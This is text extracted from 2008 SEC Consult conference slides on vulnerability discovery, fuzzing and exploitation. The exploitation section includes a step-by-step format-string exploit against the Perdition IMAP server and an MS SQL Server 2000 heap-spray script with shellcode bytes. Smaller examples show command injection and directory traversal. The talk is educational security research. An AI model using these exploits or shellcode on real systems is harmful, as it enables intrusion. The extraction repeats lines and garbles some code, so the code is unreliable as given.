Why software always breaks: From phone lines to …itsecx.fhstp.ac.at/includes/archiv_2008/unterlagen/...Purposeaboutthistalk • Show youthatmostvulnerabilitiesin IT systemsareessentiallythe

Why software always breaks: From phone lines to CPU threads

2008

Version: 1.0Autor: Bernhard MüllerResponsible: Bernhard MüllerDate: 31.10.2008Confidentiality: Public

About SEC Consult

• Leading information security advisor in Europe

• Sample customers (most customers are subject to NDA):

• Some vulnerabilities found by SEC Consult:

© 2007 SEC Consult Unternehmensberatung GmbH – All rights reserved2

• MS05-037 (Internet Explorer JVIEW profiler vulnerability)

• CVE-2005-3591 (Macromedia Flash Player memory derefence)

• MS06-029 (MS Outlook Web Access script injection)

• CVE-2006-6690 (Typo3 shell command injection)

• CVE-2007-0450 (Apache Tomcat Directory Traversal)

• Regular talks at Blackhat and other security conferences

• More information at http://www.sec-consult.com/publikationen

Purpose about this talk

• Show you that most vulnerabilities in IT systems are essentially thesame

• Fast-forward tour on vulnerability discovery and exploitation

• Give you some links and tools for your own research

• „In band control“ vulnerabilities overview

Agenda


• „In band control“ vulnerabilities overview

• Input fuzzing

• Code- and binary analysis

• Exploitation and some examples

• Very broad definition: If user input is or can be mixed with control data(intentionally or unintentionally)

• When we can manipulate control data with our input, we can almostalways hijack the control flow

What do we mean by „in band control“


Internal logic

Data processingattacker input

Overlap

attackerownage

return, exit, crash, or whatever

Why is this possible

• Intentionally, often „security by obscurity“, or nobody thought about thesecurity implications

• Examples:

• Phone phreaking

○ Phone line: Data channel = control channel


• ARP Spoofing

○ Ethernet: Data channel = control channel

• Arbitrary object instantiation

○ Also „obfuscated“ parameter passing in serialized Java objects,…

○ Nowadays, often seen in Enterprise web applications

Why is this possible

• Unintentionally (for numerous reasons)

• Programming errors

• Missing input validation

char buf[256];strcpy(buf, userinput);

exec(„sendmail „ + $recipient + „ < email.txt“)


• Incomplete input validation

• Client side input validation

http://tomcat:8080/context/\../manager/html

Testing for vulnerabilities: Input Fuzzing (1)

• Simple method• Identify the interface and expected input

• Try lots of inputs (mutated, random)

• Automated tools are available• Generic protocol fuzzers

• Web application scanners

• Etc.

• Custom tools


• Custom tools• Use perl, python, etc. (something efficient!)

• Can be based on existing fuzzing frameworks

○ Scapy (kindof), Peach , Sulley

• Manual testing• Especially useful for web applications+

• Pros: Simple, fast and efficient

• Cons: Limited coverage


• Examples:• Very simple „fuzzing“ one the command-line

• More complex example: Fuzzing MS SQL extended server stored procedures

DEMO


• More complex example: Fuzzing MS SQL extended server stored procedures

1. Look up all existing stored procedures (don´t rely on documentation alone)

2. Find out which parameters are processed

3. Write everything down in a format that your fuzzing script will be able to read

4. Create fuzzing script (e.g. based on Sulley)

5. Run script (use some existing framework to monitor results)

6. Check and verify results

• Rule of thumb: Create any (im)possible input

• This is what we want so see:


© 2007 SEC Consult Unternehmensberatung GmbH – All rights reserved

• … or any other deviation from normal behaviour…

9

• Monitoring results: Sulley web interface



Testing: In-depth application-/protocol analysis (1)

• Automatic code analysis:• Code Scanning

○ Free tools: rats,…

○ Custom tools: Perl, Python, grep,…

○ Commercial Tools: Fortify SCA, Ounce,…

• Manual code analysis or binary analysis:• Text editor (read the source), Eclipse

• Disassembler (binary analysis)


○ IDA Pro

○ OllyDBG

• Reverse Engineering• e.g. network protocol: proxy, network sniffer,…

Testing: In-depth application-/protocol analysis (2)

• Our former example (someformparser.cgi):

• Normally, it´s not that easy ☺

• Multiple ways of vulnerability analysis:


• Search for vulnerable functions and see if they are reached by user input

• Trace all user input and look if it reaches vulnerable code

• Do a complete, line by line audit, and cover the whole application

• A very complex topic obviously, we will cover that another time…

Exploitation (1)

• Problem: How do we decide if the condition is exploitable?

• Best way is a quick manual analysis (often based on experience)

• If the application / protocol is fundamentally flawed, no amount ofexternal validation and protection can help it• (Web-)application firewalls can be bypassed

• Runtime validation can be bypassed (PHP MAGIC_QUOTES etc.)

• Compiler measures can be bypassed (ASLR, Stack canaries,…)

• Intrusion prevention systems can be bypassed


• Intrusion prevention systems can be bypassed

• Most other things that someone invented can be bypassed (some are even ridiculous)

• Often, a very limited injection can be exploited• One byte memory write

• PHP file inclusion on a packet filtered and web firewalled system with most or all PHP safeguards acrivated

• See examples on the next pages• These are for binary applications, but the same principles apply to everything

Exploitation (2)

• Perdition IMAP Server: Limited format string vulnerability (2007)• One format identifier can be injected

• Can´t do things like „%.16705u%hn “

• Random stack etc. doesn´t make it any easier+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++168: static const char *__str_vwrite(io_t * io, const flag_t flag, 169: const size_t nargs, const char *fmt, va_list ap,170: int *bytes)171: {(...)186: fmt_args = 0;


186: fmt_args = 0;187: for (place = 0; fmt[place] != '\0'; place++) {188: if (fmt[place] == '%')189: fmt[place + 1] == '%' ? place++ : fmt_args++;190: }191: if (fmt_args != nargs) {(...)195: VANESSA_LOGGER_DEBUG_UNSAFE("nargs and fmt mismatch: "196: "%d args requested, %d args in format",197: nargs, fmt_args);198: return (NULL);199: }200: 201: *bytes = vsnprintf(__str_write_buf, STR_WRITE_BUF_LEN - 2, fmt, ap);+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Exploitation (3)

• Perdition IMAP Server: Limited format string vulnerability (2007)• Can be exploited by controlling program flow

1. read stack layout (to bypass ASLR)

2. put shellcode and .got address on the stack

3. overwrite .got entry for strncasecmp byte-by-byte (value is controlled by stringlength)

4. trigger call to strncasecmp

1. %13$08x -> Get shellcode address


Login()

0x08065370 .gotstrncasecmp

1. %13$08x -> Get shellcode address2. LOL LOGIN \x70\x53\x06\x08

(+Shellcode) -> Setup Stack3. LOL LOGIN AAA..AAA%.hn -> Write b14. LOL LOGIN AAA..AAA%.hn -> Write b25. LOL LOGIN AAA..AAA%.hn -> Write b36. LOL LOGIN AAA..AAA%.hn -> Write b4

7. LOL AUTHENTICATE X X -> Trigger call to strncasecmp()

Authenticate()

OWNED!

write

read

Exploitation (4)

• MS SQL Server 2000: Limited memory overwrite (0day)• SQL server crashes due to input validation error

○ Details will be published when a patch is out

• A single address can be overwritten with limited values

• Practically, we can only overwrite one DWORD with values between 0x0 and 0x1B58

• But that´s enough at least in Windows 2000


Exploitation (5)

• MS SQL Server 2000: Limited memory overwrite (0day)1. Spray the heap with NOPs & shellcode

SET @shell = @resPEB +

CHAR(43)+CHAR(201)+CHAR(131)+CHAR(233)+CHAR(221)+CHAR(217)+CHAR(238)+CHAR(217)+CHAR(116)+CHAR(36)+CHAR(244)+CHAR(91)+CHAR(129)+CHAR(115)+CHAR(19)+CHAR(187)+CHAR(124)+CHAR(50)+CHAR(131)+CHAR(131)+CHAR(235)+CHAR(252)+CHAR(226)+CHAR(244)+CHAR(71)+CHAR(148)+CHAR(118)+CHAR(131)+CHAR(187)+CHAR(124)+CHAR(185)+CHAR(198)+CHAR(135)+CHAR(247)+CHAR(78)+CHAR(134)+CHAR(195)+CHAR(125)+CHAR(221)+CHAR(8)+CHAR(244)+CHAR(100)+CHAR(185)+CHAR(220)+CHAR(155)+CHAR(125)+CHAR(217)+CHAR(202)+CHAR(48)+CHAR(72)+CHAR(185)+CHAR(130)+CHAR(85)+CHAR(77)+CHAR(242)+CHAR(26)+CHAR(23)+CHAR(248)+CHAR(242)+CHAR(247)+CHAR(188)+CHAR(189)+CHAR(248)+CHAR(142)+CHAR(186)+CHAR(190)+CHAR(217)+CHAR(119)+CHAR((128)+CHAR(40)+CHAR(22)+CHAR(135)+CHAR(206)+CHAR(153)+CHAR(185)+CHAR(220)+CHAR(159)+CHAR(125)+CHAR(217)+CHAR(229)+CHAR(48)+CHAR(112)+CHAR(121)+CHAR(8)+CHAR(228)+CHAR(96)+CHAR(51)+CHAR(104)+CHAR(48)+CHAR(96)+CHAR(185)+CHAR(130)+CHAR(80)+CHAR(245)+CHAR(110)+CHAR(167)+CHAR(191)+CHAR(191)+CHAR(3)+CHAR(67)+CHAR(223)+CHAR(247)+CHAR(114)+CHAR(179)+CHAR(62)+CHAR(188)+CHAR(74)+CHAR(143)+CHAR(48)+CHAR(60)+CHAR(62)+CHAR(8)+CHAR(203)+CHAR(96)+CHA


(114)+CHAR(179)+CHAR(62)+CHAR(188)+CHAR(74)+CHAR(143)+CHAR(48)+CHAR(60)+CHAR(62)+CHAR(8)+CHAR(203)+CHAR(96)+CHAR(159)+CHAR(8)+CHAR(211)+CHAR(116)+CHAR(217)+CHAR(138)+CHAR(48)+CHAR(252)+CHAR(130)+CHAR(131)+CHAR(187)+CHAR(124)+CHAR(185)+CHAR(235)+CHAR(135)+CHAR(35)+CHAR(3)+CHAR(117)+CHAR(219)+CHAR(42)+CHAR(187)+CHAR(123)+CHAR(56)+CHAR(188)+CHAR(73)+CHAR(211)+CHAR(211)+CHAR(140)+CHAR(184)+CHAR(135)+CHAR(228)+CHAR(20)+CHAR(170)+CHAR(125)+CHAR(49)+CHAR(114)+CHAR(101)+CHAR(124)+CHAR(92)+CHAR(31)+CHAR(83)+CHAR(239)+CHAR(216)+CHAR(82)+CHAR(87)+CHAR(251)+CHAR(222)+CHAR(124)+CHAR(50)+CHAR(131)

SET @counter = 0WHILE @counter < 7000BEGINSET @counter = @counter +1SET @sh000 = @sh000 + CHAR(144)SET @sh001 = @sh001 + CHAR(144)(….)ENDSET @sh000 = @sh000 + @shellSET @sh001 = @sh001 + @shell(...)

Exploitation (6)

• MS SQL Server 2000: Limited memory overwrite (0day)2. Overwrite MSW of FastPEBLockRoutine pointer (has to be restored by the shellcode!)

1. 0x7ffdf020: 3c 31 88 77 6d 31 88 772. 0x7ffdf020: 3c 31 97 19 00 00 88 77


HEAP: NOPS & Shellcode

Original FastPEBLockRoutine

0x1997313c

0x7788313c

FastPEBLockRoutine

The End

• References• “Internet Exploiter” by Skylined (first use of heap spraying)

http://www.edup.tudelft.nl/~bjwever/

• Perdition IMAP Proxy Format String Vulnerability (full advisory): http://www.sec-consult.com/files/20071031_perdition-imapd-fmtstr.txt

• Further reading• M. Sutton, A. Greene, and P. Amini, “Fuzzing: Brute Force Vulnerability Discovery”,

Addison-Wesley, 2007


Addison-Wesley, 2007

• Greg Hoglund and Gary McGraw, “Exploiting Software: How to Break Code”, Addison-Wesley, 2004

• Security Mailing lists

○ http://seclists.org/bugtraq/

○ http://seclists.org/fulldisclosure/

The End

• Recommended toolbox:• BURP Proxy (for testing web applications): http://portswigger.net/proxy/

• Scapy (for fuzzing network protocols): http://www.secdev.org/projects/scapy/

• Sulley fuzzing framework: http://www.fuzzing.org/fuzzing-software

• IDA Pro (good disassembler): http://www.datarescue.com/

• OllyDBG (good debugger): http://www.ollydbg.de/

• Metasploit (awesome shellcode generator): http://www.metasploit.com/

• Eclipse (for reading sourcecode): http://www.eclipse.org/


• Eclipse (for reading sourcecode): http://www.eclipse.org/

• Perl (for quick tools): http://www.perl.org/

• Python (for more complex tasks): http://www.python.org/

• MS Visual Studio: http://msdn.microsoft.com/en-us/vstudio/default.aspx

About SEC Consult

SEC Consult Unternehmensberatung GmbH

Mooslackengasse 17,

A-1190 Wien


A-1190 Wien

Tel: +43 / 1 8903043 0

Fax: +43 / 1 8903043 15

Email: [email protected]

http://www.sec-consult.com

Why software always breaks: From phone lines to …itsecx.fhstp.ac.at/includes/archiv_2008/unterlagen/...Purposeaboutthistalk • Show youthatmostvulnerabilitiesin IT systemsareessentiallythe

Documents